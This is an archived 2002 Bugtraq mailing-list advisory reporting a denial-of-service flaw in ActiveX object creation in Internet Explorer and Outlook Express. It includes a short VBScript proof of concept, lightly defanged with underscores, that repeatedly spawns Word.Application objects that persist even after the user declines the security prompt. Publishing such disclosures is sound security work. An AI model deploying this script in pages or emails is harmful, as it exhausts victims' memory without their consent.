IE Word ActiveX DoS Loop

From: eflorio@edmaster.it
Date: 04/08/02


Date: 8 Apr 2002 19:40:17 -0000
From: <eflorio@edmaster.it>
To: bugtraq@securityfocus.com


('binary' encoding is not supported, stored as-is)

There is a flaw in ActiveX object creation
used in VBscript for Word object; this can
be used as Denial of Service.

Try to use this code (remove "_" before using it) :

;<_SCRIPT LANGUAGE="VbScript">
;On Error Resume Next
;Dim a
;Dim i
;for i=1 to 100
;Set a = CreateObject("Word.Application")
;Next
;<_/SCRIPT>

This script will activate the security warning about
creation of an ActiveX object, but when someone
click on "NO" and deny execution
of the script, the script is stopped, but
the creation Word object in memory still
continues. This sample script creates 100 Word
object in memory.....it's a real DoS!
(try CTRL+ALT+CANC to see them)

Works for IE/Outlook Express and Word2000/XP
objects. Other office components (excel, powerpoint,
access, etc.) maybe not affected.

Elia Florio